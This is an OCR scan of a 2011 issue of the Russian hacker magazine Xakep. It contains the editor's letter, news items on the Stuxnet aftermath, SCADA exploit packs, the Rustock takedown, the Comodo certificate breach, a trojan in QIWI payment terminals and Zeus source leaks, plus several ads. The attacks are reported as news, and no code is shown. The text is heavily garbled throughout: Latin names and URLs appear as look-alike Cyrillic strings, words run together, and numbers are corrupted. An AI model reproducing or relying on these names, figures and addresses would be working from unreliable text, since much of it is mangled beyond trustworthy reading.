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ІГОО 



В ЭТОМ МЕСЯЦЕ У МЕНЯ ЦЕЛАЯ КУЧА НОВОСТЕЙ, ДЕЛЮСЬ 
С ТОБОЙ САМЫМ ВАЖНЫМ: 

1. Прежде всего хочу тебе представить нового редактора рубри- 
ки РЬгеакіпд. С этого номера мы возвращаем эту легендарную 
рубрику в журнал, и теперь заниматься ей будет Серега «китекау» 
Сильнов. Кстати, можешь слать ему все свои самые безумные 
фрикерские идеи, начиная с абстрактных предложений по сборке 
человекоподобного робота-чемпиона для боев без правил и закан- 
чивая готовыми статьями на темы электронного йІУ. Адрес ты легко 
найдешь на следующем развороте. 

2 . Вторая суперновость — это возможность покупать журнал напря- 
мую в редакции по 90 рублей за выпуск. Суть в том, что это при- 
мерно та цена, по которой мы отгружаем журналы в розничные сети. 
Сам понимаешь, как нехило наваривают розничные продавцы. 

И мы рассудили: а почему бы нам не предоставить нашим читателям 
возможность покупать журнал по этой же цене? Сказано - сделано. 
Условия очень простые: заходишь на сайт ѵѵѵѵѵѵ.хакер.ги/росірізка . 
выбираешь подписку с самовывозом из редакции, оформляешь 
и оплачиваешь ее (540 рублей за полгода, 1080 рублей за год). 

После этого ты можешь получать журнал в нашем офисе на улице 



Ленинская Слобода на следующий день после выхода. К слову, 
оплатить можно самыми разными способами, начиная с банковских 
карт и заканчивая олдскульной банковской квитанцией. 

3. В этом месяце мы начали производство нашего фирменного 
подкаста — подкаста журнала Хакер. Как легко понять из назва- 
ния, наши основные темы — это информационная безопасность, 
различные технологические инновации, лайфхаки и трюки при 
использовании компов, ОС и сетевых сервисов. 

Обычно мы записываем подкаст со Степом, плюс часто зовем в 
гости какого-то интересного человека. Например, на диске к этому 
номеру ты найдешь подкаст с Александром Матросовым — руково- 
дителем вирлаба ЕзеС 

4. По сквозному номеру на обложке легко понять, что грядет 
очередной супер-юбилей нашего журнала: 150-ый номер. Это 
событие произойдет в мае, и в этом номере мы анонсируем нашу 
Х-вечеринку, которая пройдет 27 мая, в пятницу. Все подробности 
ты можешь узнать на странице ѵѵѵѵѵѵ.хакер.ги/1 50х . 

пікііогг, гл. ред. X 

ЬирУ/ѵкопІакІе.ги/хакер тад 
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Ты наверняка помнишь, какой переполох наделал в прошлом году вирь 
5іихпех, одной из целей которого, предположительно, были заводы 
по обогащениюурана. Долета прошлого года уязвимости, подобные 
той, что использовал Зіихпеі, вообще считались чем-то вроде страш- 
ных баек. Зато после ВШхпеЕа специалисты в области ИБ (втом числе 
из «Лаборатории Касперского» и 5утап1:ес] начали прогнозировать, 
что атаки на промышленные объекты в будущем, увы, станут более 
распространенным явлением. Похоже, их слова медленно, но верно 
воплощаются вжизнь. Кпримеру, по информации издания ОЛаѵѵа Зип, 
в Канаде нетакдавно былозафиксировано несанкционированное про- 
никновение в энергосистему — хакеры внедрили малварь в компьютеры, 
управляющие канадскими электросетями. Конец марта 201 1 и вовсе 
ознаменовался выходом нескольких десятков эксплойтов, ориентиро- 
ванных на ЗСАОА-системы. Напомним, что 5САБА расшифровывается 
какЗирегѵізогу Сопігоі Апб Оаіа Асциізібоп, то есть: программа для дис- 
петчерского управления и сбора данных. Такого рода софт контролирует 
работутехники на ядерных станциях, электростанциях, газоочиститель- 
ныхзаводах, в аэропортах и на многих промышленных предприяти- 
ях. Первый эксплойт-пак под названием Адога 5САБА+ выпустила 
небольшая московская компания Оіед, чей сайтсразу после релиза слег 
под мощной ООоЗ-атакой. Двадцать два модуля этого набора включают 
эксплойты для одиннадцати Обау-уязвимостей. Следом за нашими со- 




отечественниками еще более крупный набор эксплойтов опубликовал 
независимый специалистпо информационной безопасности Луиджи 
Ауриэмма. Емуудалось найти тридцать четыре дырки, втом числе и 
втоповых продуктах данного сегмента рынка: в ОіетепзТеспотаІіх 
ЕасІогуЫпк, Ісопісз 6ЕЫЕ5І5, 7-ТесбпоІодіез 1055 и БАТАС ПеаІѴѴіп. В 
отличие от Оіед, Ауриэмма уязвимостями неторгует, он выложил их в 
открытый доступ, так как считает, что в области ЗСАБА-софта все очень 
плохо, и информация о дырах должна быть максимально открытой и до- 
ступной. Ведьтакое ПО зачастую работает на устаревшем оборудовании, 
заменить которое без остановки производственных процессов невоз- 
можно. В итоге, производители предпочитаютзабыть о безопасности и 
оставляют все, как есть. РгооГ-оГ-сопсерІ код и список дыр доступны по 
адресѵ зесІізІз.огд/ЬидІгад/201 1/Маг/187 . 



» Свершилось! После долгих раздумий в ІСАИИ все же решили дать 

доменной зоне .ххх зеленый свет. Ожидается, что цена домена составит 
$60. Уже принято более 200 000 предварительных заявок. 



ФУТУРИСТИЧНАЯ ЗАЩИТА ДАННЫХ 




Для защиты информации придумано великое множество средств и способов, при- 
чем немалая их доля приходится на различные аппаратные решения. Интересную 
новинку в этой области представила компания ЫЕС. Устройство, пока известное как 
Н5100-10, являет собой бесконтактный гибридный сканер отпечатков пальцев. Само 
по себе применение дактилоскопии в частности и биометрики в целом для ІТ не ново, 
но пока эти системы далеки от идеала. Вспомним хотя бы кино: чтобы вскрыть хитрый 
электронный замок, оснащенный дактилоскопическим сканером, злоумышленники 
отрезают кому-нибудь палец, а то и всю кисть руки, прикладывают к датчику устрой- 
ства — и готово. Можнотакже снять отпечатки с любого предмета обихода — стакана, 
зажигалки итакдалее. Новинка отЫЕСделаетподобный сценарий невозможным. 

Н51 00-1 0 сканирует нетолько сам отпечаток, но и расположение сосудов под кожей, а 
также «видит» кровоток. При этом прикасаться к сенсору устройства ненужно, — оно 
способно считать нужную информацию и с небольшого расстояния. Не станут помехой 
в работе девайса даже влажные руки, что обычно является проблемой среди такого 
рода устройств. Н51 00- 10 будет вы пущен в двух вариантах — 115В и автономном. 

Релиз запланирован на начало лета, ноо цене устройства, ксожалению, пока ничего 
не известно. 



► 004 



ХАКЕР 05 /148/ 201 1 





ВСЁ В ДОМ! 



ПРИЗЫ от 



ПЁТР|3 




ЛЁТР 



Общий срок проведения Акции - с 25 апреля 2011 г. по 30 июля 2011 г. 
Регистрация кодов - с 25 апреля 2011 г. по 12 июня 2011 г. на сайте 
ѵѵѵѵѵѵ.реіг-1 .ш и по ЗМЗ на короткий номер 5206. Полная информация 
об организаторе Акции, правилах ее проведения, количестве призов 
по результатам Акции, сроках, месте, порядке их получения и стоимости 
отправки ЗМЗ - на сайте ѵѵѵѵѵѵ.реіг-і .ги 



УЧАСТВУЙ В ВИКТОРИНЕ «ВСЁ В ДОМ» 
И ВЫИГРЫВАЙ СЕРТИФИКАТ 

на покупку*: 



ТЕЛЕВИЗОРА 

СТЕРЕОСИСТЕМЫ 

НОУТБУКА 

ДИВАНА 

ХОЛОДИЛЬНИКА 

ВЫИГРЫВАЙ СПЕЦИАЛЬНЫЙ ПРИЗ 
В ИГРЕ «ДОМОТЕТРИС» 

УЗНАЙ БОЛЬШЕ НА САЙТЕ ѴУѴѴѴѴ.РЕТЯ- 1 .КЦ 



иі»а 



ПОЛУЧАЙ ГАРАНТИРОВАННЫЕ ПРИЗЫ 
- БОНУС НА СЧЕТ МОБИЛЬНОГО ТЕЛЕФОНА 
ЭКВИВАЛЕНТНЫЙ СУММЕ: 

1 0 кодов - 1 00 рублей 
20 кодов - 200 рублей 
30 кодов - 300 рублей 



штрВ 



ПЁТР 



КУРЕНИЕ 



КУРЕНИЕ 

УБИВАЕТ 



КУРЕНИЕ 

УВИВАЕТ 



КУРЕНИЕ 

УБИВАЕТ 



УБИВАЕТ 



*Всего 35 сертификатов на сумму 30 000 рублей каждый. 



Ш ' * МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ: 

_ > КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 




МЕ6АЫЕШ5 



БИТВА ЗОИУ ПРОТИВ ХАКЕРОВ ПРОДОЛЖАЕТСЯ 




Неуспели мы в прошлом номере рас- 
сказать тебе о судебном процессе Зопу ѵз 
ѲеоНоЕ как во всю эту историю оказа- 
лись вовлечены и другие взломщики- 
исследователи. Александр Егоренков, 
известный в Сети под ником дгаіщсбокоіо, 
также участвовал во взломе РІауЗіабоп 
3 и тоже за это поплатился. Зопу подала 
в суд и на него (за нарушение авторских 
прав), после чего в квартире Егоренкова, 
проживающего в Германии, был произ- 
веден обыск, в ходе которого были изъяты 
файлы, имеющиеотношение квзлому Р53. 
Очевидно, это не привело хакера в восторг, 
та к как в ответ он опубликовал на своем 
сайте труд под названием «НѴ ВіЫе». По 
сути, это руководство по взлому, в котором 
описанатехнология применения гиперви- 
зора для взлома игровых консолей. Зопу 
такой шагтоже не обрадовал, и компа- 
ния немедленно потребовала удалить 
информацию из открытого доступа, на 



что дгаіщсбокоіо ответил : «Они до сих пор 
не понимают, как работает мой мозг. Они 
хотят наказать меня в назидание другим 
хакерам — мол, вот, что стобой случится, 
если свяжешься с Зопу. Что ж, они выбра- 
ли нетого парня. Если хотите остановить 
меня, то вам придется меня убить». Сейчас 
Егоренков собирает пожертвования на суд 
с Зопу. КакиХотцу, ему без труда удалось 
собрать кругленькую сумму (на первое 
время ему было нужно €16-20 000). Под- 
робности, а также последние комментарии 
«виновника торжества» можно почи- 
тать в его блоге [ дгаісЬокоІо.сот ). Тем 
временем новая прошивка 3.60, похоже, 
уже взломана. Хакер, скрывающийся под 
псевдонимом ѴѴіпост, опубликовал видео 
джейлбрейка на ѴоиТиЬе, но отказался 
выложить сам джейлбрейк в паблик. Пока 
непонятно, боится ѴѴіпост гнева Зопу, или 
же просто захотел внимания и запустил в 
Сеть «утку». 



» Похоже, МуЗрасе медленно, но верно загибается. Данные компании 
сотЗсоге гласят, что количество уникальных посетителей ресурса 
падает: только с начала года их число снизилось с 73 до 63 000 000. 



МЗТОСК ЗАКРЫТ, ОБОРОТ СПАМА РЕЗКО СОКРАТИЛСЯ 




Новые ботнеты появляются едва ли не каждый день, а вот прикрыть 
крупный ботнетудается нетакуж часто. Приятное «исключение из пра- 
вил» имело место в середине марта : власти США при активном участии 
компании МісгозоІТ сумели аннигилировать один из известнейших 
ботнетов планеты, существовавший с 2006 года — Ризіюск. Данная сеть 
активно использовалась для рассылки спама. Когда ботнетбыл на пике 
своей активности, с каждой инфицированной машины отправлялось по 
192 спам-сообщения в минуту. Число зараженных компьютеров в разное 
время колебалось от 150 000 до 2 400 000. Словом, подсчитать масштабы 
бедствия нетрудно, и совсем неудивительно, что Ризіюск в лучшие време- 
на генерировал почти половину всего спам-трафика в интернете. На За- 
паде была проведена целая операция под кодовым названием Ы07. Поее 
завершении специалисты из Місгозо^ ОідкаІСгітез ІІпіІ: и федеральные 
маршалы США, вооружившись постановлением окружного суда штата 
Вашингтон, отключили отСети сервера, с которых осуществлялосьуправ- 
ление Ризіюск. Иск на анонимных операторов ботнета подавал Місгозоіф 
отчасти основываясь на нарушении торговых марок М іеговой — в спаме, 
рассылаемом ботнетом, фигурировали лотереи, якобы проводимые 
мелкомягкими. Сервера были изъятыу пяти хостинг-провайдеров, рабо- 
тающих в семи городах США. Результат операции не заставил себя ждать: 
количество спама в мировом трафике тут же снизилось на 33.6%. Да-да, 
спам-трафиксократился на целую треть, ведьтолько в первой половине 
марта, перед самым закрытием, Ризіюск разослал 13820 000 000 едини 
нежелательной корреспонденции. К сожалению, такое затишье продлит- 
ся недолго. Теперь в лидеры по генерации спама выходят ботнеты Вадіе 
и Еезіі.уже начавшие развивать бурную деятельность. Пока упомянутые 
ботнеты рассылают«всего»по8310 000 000 и 4200 000 000 писем вдень 



соответственно, но эти цифры скоро изменятся. Вадіе, ко всему прочему, 
активно действует в России — 22% зараженных машин находятся именно 
натерритории нашей страны. Это опять вывело Россию в лидеры среди 
стран, генерирующих спам. Ситуация напоминаетпоединокГеракла с 
Гидрой — срубили одну голову, на ее месте тутже вырастаютдве новых. 
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Давно хотел сделать фильм про любимую фут- 
больную команду и показать друзьям? Больше 
никаких отговорок: с І_епоѵо У560 ты можешь все! 



Ноутбук І_епоѵо У560 позволит воплотить в жизнь то, о чем ты 
мечтал. Процессор Іпіеі® Соге™ І7 - это мощность, достаточная 
для самых невероятных задач. Ты будешь поражен фантасти- 
чески высокой скоростью загрузки этого компьютера, которая 
стала возможной благодаря фирменной системе І_епоѵо ПарісІ 
Огіѵе. Поделись своим творчеством с друзьями: главное досто- 
инство этого ноутбука - новейшие мультимедийные технологии. 

Широкоформатный НО-дисплей подарит наслаждение от про- 
смотра фильмов, а высококачественные колонки ЛВІ. с функ- 
цией йоІЬу® Ноте ТНеаІге™ придадут любимым песням новое 
звучание. С ноутбуком І_епоѵо У560 у тебя будет мгновенный 
доступ к видео и музыке, а функция ОпеКеу ТНеаІге 2.0 подберет 
идеальные настройки для мультимедиа нажатием одной кнопки. 



Быстрее. 

Умнее. 



Впечатляет? Действуй! 

Ноутбук І_епоѵо У560 на базе процессора Іпіеі® Соге™ І7 



Іп*еІ, логотип Іпіеі, Іпіеі Іпзісіе, Іп*еІ Соге и Соге Іпзісіе являются товарными знаками корпорации ІпіеІ на территории США и других стран. 




Реклама 



МЕ6АЫЕШ5 



ДОСТИЖЕНИЯ В ОБЛАСТИ БЕСПРОВОДНОГО ВИДЕО 



Судя по всему, совсем скоро мы сможем сокра- 
тить количество проводов в наших квартирах за 
счет беспроводной передачи видео. Техноло- 
гий, позволяющихтранслировать видео-поток 
нателевизор или монитор, не путаясь при этом 
в разных шнурах, уже существует целый ряд. 

Это ѴѴіге ІеззН О, ѴѴНОі, ІпіеІѴѴЮі и другие. Как 
правило, услышав словосочетание «бес- 
проводное видео», мы мысленно аннулируем 
только один провод, оставляя на месте шнур 
питания. Компания РщТзи решила зайти 
немного дальше и продемонстрировала на 
выставке СеВІТ новую технологию 51ІРА (Зтагі: 
ІІпіѵегзаІ РоѵѵегАссезз]. Вот здесь проводов 
действительно не понадобится. Вообще. РщТзи 
показала 22-дюймовый монитор, энергия кото- 
рому сообщается посредством ЭДС-индукции: 
отпередающей антенны кмонитору. Специ- 
альное устройство в мониторе конвертирует 



поток индукции обратно в электрический ток. 
Антенны встраиваются в мебель или стены 
(на данный моментпредел мощности около 
25 Вт], и вся система работает по аналогии с 
индукционными кухонными плитами. На СеВІТ 
рольтакого девайса сыграла крышка стола, на 
котором стоял монитор. Изображение, в свою 
очередь, передается по радиоканалу от 115В- 
концентратора ПК или ноутбука, который мо- 
жет быть удален от монитора на расстояние до 
десяти метров. Производствотаких мониторов 
в Рщіізи планируют начать уже в будущем году. 
Интересно, столы тоже выпустят в продажу? :) 
Еще одной интересной новинкой в данной 
сфере стала разработка компании Заппзипд, 
представившей на СеВІТ сенсорныйЖК-экран 
с питанием отсолнечной батареи. Полупро- 
зрачная ѴА-панель с диагональю 46 дюймов 
демонстрирует разрешение 1 920 х 1080 пиксе- 




лей. Сенсорный экран распознает до десятка 
одновременных прикосновений. А благодаря 
высокой энергоэффективности для работы все- 
го этого великолепия вполне хватает окружаю- 
щего освещения. Ксожалению, подробностей 
относительно этой разработки Заппзипд пока 
не разглашает. 



» 



За первые 30 минут после запуска НгеТох 4 его скачало более 550 000 
человек. ■ 



ДАЙТЕ ДВЕ! 



В ближайшее время на прилавках книжных мага- 
зинов появится исчерпывающее руководство по 
развертыванию и повседневному обслуживанию 
операционных систем ѴѴіпсІоѵѵз 7 и ѴѴіпсІоѵѵз Зегѵег 
2008 Р2. Книга написана нашими коллегами Сергеем 
Яремчуком и Андреем Матвеевым, хорошо знакомым 
тебе по рубрикам 5ѴІЧ/АСК и ІЛЧІХОЮ. На страни- 
цах издания рассматриваются такие вопросы, как 
администрирование клиентских и серверных ОС, 
управление сетевыми службами, автоматизация 






развертывания, повышение производительности, 
интеграция ѴѴіпсІоѵѵз с II N IX, обеспечение безопас- 
ности сетей, рабочих станций и серверов. Особое 
внимание уделено службе каталогов Асбѵе ОігесЕогу 
и новым функциям, недоступным в предыдущих 
версиях ѴѴіпсІоѵѵз. Книга «Системное администриро- 
вание ѴѴіпсІоѵѵз 7 и ѴѴіпсІоѵѵз Зегѵег 2008 Р2 на 100%» 
рассчитана на широкий круг читателей, но в первую 
очередь, конечно, она будет интересна сисадминам и 
ІТ-специалистам. 



СИСТЕМНОЕ 

АДМИНИСТРИРОВАНИЕ 

ѴѴ№ЮОѴѴ57 
и ѴѴМООѴѴ5 
5ЕКѴЕК 2008 К2 




СОЗДАТЕЛЕЙ 6Н03ТМАККЕШТ ПОСАДИЛИ 




Недавно в Великобритании состоялись слушания по делу создателей ре- 
сурса СЬОзіМш^іеСпе .Данный сайт — яркая иллюстрация квысказыва- 
нию «спрос рождает предложение». Когда у хакеров и кардеров на руках 
имеются работающие ботнеты, всевозможная малварь, дампы угнанных 
кредиток и прочие нелегальные штуки, этим «товаром»так и подмывает 
поделиться — сдать в аренду, продать и такдалее. Упомянутый сайт как 
раз являл собой своеобразную торговую площадку для киберпреступни- 
ков, этакая извращенная социальная сеть. Кстати, на Обоз1:Магке1;также 



можно было найти рецепты взрывчатых веществ, способы изготовления 
наркотиков в домашнихусловиях, хак-мануалы и прочую нелегальщину. 
По информации правоохранительных органов, сайтом пользовалось 
порядка8000человекизразныхстран мира. В общей сложности на 
ОЬозШагкеІ: были размещены данные о 65 000 банковских счетов, при 
этом убытки владельцев карт составили более $25 000 000. За доступ к 
сайту создатели собирали абонентскую плату. Конечно, такое вопиющее 
нарушение законов не могло остаться незамеченным. Авторов ресурса 
выследили и вскоре арестовали. Ими оказалисьтрое британцев: 19-лет- 
ний НикУэббер, 18-летний Райан Томас и 21-летний Гэри Келли. Несмо- 
тря на возрастобвиняемых, суд вынес им весьма жесткие приговоры. 
Томас, исполнявший роль системного администратора ресурса, получил 
четыре года. Уэббер, которому принадлежала идея создания сайта и 
сам сайт, получил пятьлеттюрьмы за мошенничество в интернете. 
Келли, написавший программу для кражи данных о банковских картах и 
помогавший с хостингом, также отправится за решетку на пятьлет. Все 
сроки отнюдь неусловные. В руки полициитакже попали базы данных и 
различные интересныелоги.такчто посетителям сайта, пожалуй, тоже 
пора начинать беспокоиться. 
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Товар сертифицирован. Реклама. 




Затзипд САІ^АХѴ Асе 
твое новое увлечение 









но 



оно но 






ПРУзья вТоциа ОМО>І<ет тебе Узнать 

Лай ^ й — . а 

П0 * а " еуста ^. 



А еше ѵ гитары нет большого сенсорного 

дисплея 3,5" и мощного процессора 800 М ц иг 

™ Та Р у .І Ы НѲСкачаешь тысячи приложений 
с АпсІгоісІ Магкеі и Затзипд Аррз 2 , 



сігючою™ 

іесЬпоІоду 



Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 

АпсІгоісІ и АпсІгоісІ Магкеі являются товарным знаками корпорации (Зоодіе. 
1 Турбо . 2 Библиотека приложений Затзипд . 3 Галактика . 4 Асе. 



МЕ6АЫЕШ5 



БУДУЩЕЕ ИЕ-СЕТЕЙ В РОССИИ 



Наконец-то стало известно, каким же образом 
будут развиваться І_ТЕ-сети на территории 
России. В московском офисе «Скартел» (УоЕа], 
в присутствии премьер-министра Владимира 
Путина и министра связи Игоря Щеголева, 
представители крупнейших сотовых операторов 
и их акционеры («МТС», «Мегафон», «Ростехно- 
логии», «Вымпелком» и «Ростелеком») подписа- 
ли соглашение. Сутьдокумента заключается в 
следующем: «Скартел» своими силами построит 
сеть в 1 80 городах России (затраты составят 
примерно $2 000 000 000), а «большая тройка» 



и «Ростелеком» получат возможность исполь- 
зовать инфраструктуру этой І_ТЕ-сети путем 
оптовой закупки трафика. После 2014 года все 
партнеры «Скартел а» также получат возмож- 
ность реализоватьсвои опционы на приоб- 
ретение ее акций в равныхдолях. Генеральный 
директор «Скартел» Денис Свердлов уверяет, 
что мощностей построенной сети хватит для 
всех пяти операторов, которые, в свою очередь, 
смогутзначительно сэкономить на создании 
инфраструктуры. Дело в том, что если бы не со- 
глашение, на всехжелающих частот попросту не 




хватило бы. Напомним, что «Скартел» владеет 
полосами частот шириной 30-40 МГц (в зависи- 
мости от региона) в диапазоне 2.5-2. 7ГГц. Не- 
которые эксперты, однако, этого энтузиазма не 
разделяют, утверждая, что частотѴоІа все равно 
на всех не хватит, а «Большая тройка», подписы- 
вая соглашение, лишьсдерживаетпоявление и 
развитие федерального конкурента. 



Ф0Т0-ГЕ0-С0ЦИАЛЬНАЯ СЕТЬ 



На Западе обнаружился новый, весьма 
странный стартап, которому многие аналитики 
прочат чутьли неуспех ЕасеЬоок. Фото-гео- 
социальная сеть С о Іо г толь ко -толь ко на- 
чала свое распространение через Арр Зіюге 
и Апбгоіб Магкеі, где можно приобрести 
одноименное приложение. Эта простенькая 
программка позволяетобмениваться фото- 
графиями с окружающими людьми. Нет, это 
не шутка — приложение просто позволяет 



в режиме реального времени посмотреть 
фотки, например, соседа по кафе (если у него 
тоже установлен Соіог]. Никаких «френдов» 
или «фолловеров» здесь нет, пользователи 
взаимодействуют исключительно по гео- 
графическому принципу. Но самое странное 
во всей этой истории заключается в том, что 
венчурные фонды Зециоіа Сарііаі, Ваіп Сарііаі 
и Зііісоп Ѵаііеу Вапк инвестировали в Соіог 
$41 000 000. Заочно, фактически еще до старта 




проекта. Все это в целом наводит на печальные 
размышления о росте нового пузыря доткомов 
и безумном, безумном мире. 



» Какая ирония - МуЗОІ_.сот и Зіш.сот взломали, используя 301- 
инъекцию. Специалисты ИакесІ Зесигііу также сообщают, что пароли 
сотрудников оказались очень просты - например, директор по продукции 
ѴѴогсІРгезз пользовался паролем из четырех символов. 



ПОБЕДА В ЕАСЕВ00К НАСКЕГС С1)Р 
ОСТАЛАСЬ ЗА РОССИЯНИНОМ 




Совсем недавно мы писали отом, что ЕасеЬоокучредил и дал старт хакерскому 
состязанию ЕасеЬоок НаскегСир. Теперь пришла пора подвести его итоги. В 
соревновании, разделенном на три этапа, приняли участие 1 1 768 человек из 
разных стран мира. Лучшие из них (25 человек) были приглашены в штаб-квартиру 
ЕасеЬоок, чтобы принять участие в финальном этапе конкурса (в котором требо- 
валось как можно быстрее решить три алгоритмические задачи) и посмотреть на 
работу компании изнутри. Среди этих счастливчиков были 7 человек из Польши, 

6 — из России, 4 — из США, 2 — из Японии и по одному представителю Китая, Гер- 
мании, Нидерландов, Сингапура, Швейцарии и Украины. Одним из шести россиян 
стал Петр Митричев, чье имя известно всем, кто следитза спортивным програм- 
мированием. Дело в том, что Петр постоянный участник и призер целого ряда 
аналогичных соревнований (ТорСобег, Соодіе Собе бат и та к далее). На ЕасеЬоок 
НаскегСир Митричеву снова удалось показать класс: обогнав своего основного 
конкурента и серьезного соперника Л у Тиан Ченга ака АСПизЬ, он сумел занять 
первое место и стал обладателем кубка Наскег Сир и $5 000. Недаром Митричева 
называют одним из сильнейших программистов мира. Поздравляем с победой! 
Информацию о задачах соревнования, а также фото и видеоматериалы можно 
найти по адресу ІасеЬоок.сот/Ьаскегсир . 



► ОІО 
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ГРОМКАЯ ЗАВАРУШКА 
ЗЗЬСЕРТИФИКАТАМИ 




Настоящая «история с географией» приключилась с 55 Б- 
сертификатами, выданными компанией Сотосіодля крупнейших 
мировых веб-сервисов ( таіі.доодіе.сот . доодіе.сот , Іодіп.уаЬоо. 
сопл . [одт.зкуре.сот . аббопз.тогіИа.огд , Іодіп.ііѵе.сот ]. 1 5-го марта 
СЕО компании Мел их Абдулхай о глу сообщил, что в результате 
тщательно спланированной и крайне изощренной атаки, «которую, 
вероятнее всего, инициировало иранское правительство или дру- 
гой спонсируемый государством субъект», на их сервера проникли 
злоумышленники. Хакерам, которых Абдулхайоглу обрисовал как 
форменных Бетманов с иранскими ІР, удалось заполучить ключи 
шифрования, требуемые для создания 556-сертификатов. 

В итоге было выпущено девять поддельных 55І_-сертификатов сай- 
тов компаний боодіе, 5куре, МісгозоГі:, Могіііа и Ѵабоо. Если кому-то 
удалось перенаправить трафик клиентов на, скажем, Іодіп.гкуре. 
сот , то браузер не заметил бы подвоха, поскольку у поддельного 
домена был правильный сертификат. История получила неожидан- 
ное продолжение, когда по адресу раз1:еЬіп.сопп/74КХСаЕ2 появился 
манифест хакера- одиночки, бравшего всю ответственность за 
взлом на себя. Хакер, под писавший свое поел ание«бапат Еабауе 
ВабЬаг» (в переводе сиранского — «готов отдать свою душу за 
моего вождя»], рассказал, что он не «правительство» и не «группа 
высококвалифицированных специалистов», а простой 21 - летний 
парень, действовавший в одиночку. 

Впрочем, также он называет себя призраком и утверждает, что 
обладает опытом тысячи программистов и хакеров. Оказалось, что 
цепочка взлома начинается с эксплуатации уязвимости одного из 
реселлеров Сотобо — сайта ІпзіапіББЦі . В результате парень по- 
лучил полный доступ, а во время тщательного изучения наткнулся 
на библиотеку ТгизШИ. 611, которая была написана на С#. Но самое 
забавное, что в ней в чистом виде были зашиты логин и пароль для 
АРІ Сотобо, которые хакер без проблем вытащил, дизассембли- 
ровав код. Тут надо сказать, что к манифесту многие специалисты 
ИБ отнеслись неоднозначно, скептически оценивая достоверность 
данных. В доказательство взлома хакер привел фрагменты дизас- 
семблированного кода. Общественность хакеру не поверила, и тог- 
да он принялся публиковать куски кода (например, часть ТгизШЕБ], 
содержимое баз данных, а затем и сертификат сайта Могіііа аббопз. 
Все упомянутое, а также детальную информацию о самом взломе ты 
найдешь по ссылке, указанной чуть выше. 
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МЕ6АЫЕШ5 



ТРОЯН В ТЕРМИНАЛАХ ОІѴѴІ 




Как известно, взломать можно все, и банковскиетерми- 
налы (а также терминалы различных платежных систем) 
исключением не являются. Компания «Доктор Веб» 
недавно сообщила об обнаружении втерминалах«одной 
широко распространенной в России сети» модифика- 
ции старенького троянца Тго)ап.РѴѴ5. 05 МР. Оказалось, 
речь идето сети Оіѵѵі. Малварь поражаеттерминалы с 
ѴѴі псіоѵѵз на борту и работает довольно просто: внедряясь 
в процесс та га Цехе, троян подменяет номер кошелька, 
на который пользователь перечислял средства, номером 
мошенников. В результате денежки утекают в неизвест- 
ном направлении. Заражение автомата происходит через 
ІІ5В-устройство, то есть чаще всего через обычную флеш- 
ку (подключаемую к тер ми налу самими сотрудниками). 
После инфицирования происходитавтозапуск бэкдора (к 
слову, написанного не на чем-то, а аж на БеІрЫ] ВаскБоог. 
Ризбпік, который связывается с сервером первого уровня 
и получает конфигурационную информацию. Далее, исходя 
из полученных данных, малварь находит сервер второго 
уровня (чей адрестолько что узнал), откуда уже получает 
приказ загрузитьТго)ап.РѴѴ5.05МР стретьего сервака. 

По словам президента группы Оіѵѵі Андрея Романенко, 
зловреда обнаружили вовремя, Ог.ѴѴеЬ и «Лаборатория 
Касперского» быстро справились с проблемой, и «ущерба 
для пользователей зафиксировано не было». Хотелось бы 
верить, что все действительно обошлось, так как компания 
«Доктор Веб» сообщила, что во взломанныхтерминалах 
были обнаружены признаки работы ботнета. 



НОВИНКИ ОТ ЕЯІРІЕК 



Китайская компания Ебібегхорошо известна 
на российском рынке своими аудиосистемами. 
Девиз Ебібег гласит: «Качественный звукпо 
разумной цене». Почти вся акустика компании 
щеголяет деревянными корпусами, а наро- 
ч ито б юджетн ы е м одел и у ЕсІіЕіег отсутствуют 
каккласс. Очередная новинка, получившая 
маркировку 53300, строится на базе известной и 
хорошо зарекомендовавшей себя модели 5330, к 
которойтеперьдобавился цифровой вход. Новая 
2.1 система может похвастаться аккуратным, 
стильным дизайном, деревянным сабвуфером 
и покрытыми рояльным лаком сателлитами. По- 
следние модели ЕбіЕегитакотличала бесшо- 
вная конструкция корпусов, а в сателлитах 53300 
нет даже стыков. По сути, 5330 0 можно отнести к 
такназываемой декоративной акустике. Многим 
пользователям придется по вкусу и необычный 
проводной пульт ДУ на резиновой подкладке. 
Непосредственно на нем расположены выход 
на наушники и дополнительный АЕІХ-вход, что 
оченьудобно. Суммарная мощность системы 



составляет 72 Вт. Диапазон воспроизводимых 
частот 20 — 20 000 Гц. За счет цифрового входа 
53300 нетолько идеально подойдет для работы 
с компьютером, но и неплохо сработаете раз- 
личными консолями (ХЬох, 5опу Р1ау51:абоп) и 
медиаплеерами. Кстати говоря, компания ЕбіЕег 
обновила и старшие модели данной линейки — 
55300 и 57300, такчто выбрать новую аудиоси- 
стему можно на любой вкус и бюджет. 




ПОСЛЕД 

СВОДКИ 




Мы продолжаем следить за событиями вокруг 
популярного инструментария 2еи5, которые 
развиваются весьма интересным образом. На- 
помним, что недавно стало известно о слиянии 
воедино двух ранее конкурирующих таіѵѵаге- 
разработок — 2еи5 и 5руЕуе. Эксперты уже 
изучили новые образчики троянов и пришли к 
неожиданным заключениям. Ранее предполага- 
лось, что владелец 5руЕуе, который и заполучил 
на руки исходники обоих «продуктов», использу- 
ет все самое полезное из 2еи5, «прокачав» с его 
помощью свое детище. Вместо этого оказалось, 
что новый образец«Зевса» пополнился новым 
функционалом, что позволяет говорить о про- 
должении его поддержки. Эксперт «Лаборатории 
Касперского» Дмитрий Тараканов в своем блоге 
пишет: «В новом необычном сампле обнару- 
жилось двойное шифрование. Сначала данные 
расшифровываются по стандартному алгоритму, 
но адрес кфайлу конфигурации при этом получа- 
ется фальшивый. И только вторая расшифровка 
дает реальную ссылку на файл конфигурации, в 
котором, собственно, указывается адрес центра 
управления ботнетом». Ниже эксперт добавляет: 
«Несколько дней назадя нашел 2еи5, который 
тоже проверяет, не запущен ли он для анализа, 
например, в антивирусной компании. Функцио- 
нал тотже, ноуже с небольшими изменениями: 
добавился еще один критерий для обнаружения 
новой тестовой площадки». 

Тем временем на андеграундных форумах снача- 
ла прошел слух о продаже исходников «Зевса», 
а затем появился и продавец с коммерческим 
предложением и скриншотами. Товарищ под 
ником 100 готов обсудить стоимость через ЗаЬЬег 
или ІСО и принять платежна любой банковский 
счет, оформленный на третье лицо. Эксперты в 
области И Б подтверждают: в самом деле похоже, 
что втечение последних нескольких недель 
исходники 2еи5 стали доступны более широкой 
публике, а нетолько его авторам. 




» По статистике проекта 2опе-Н в 2010 году было дефейснуто 1 419 203 
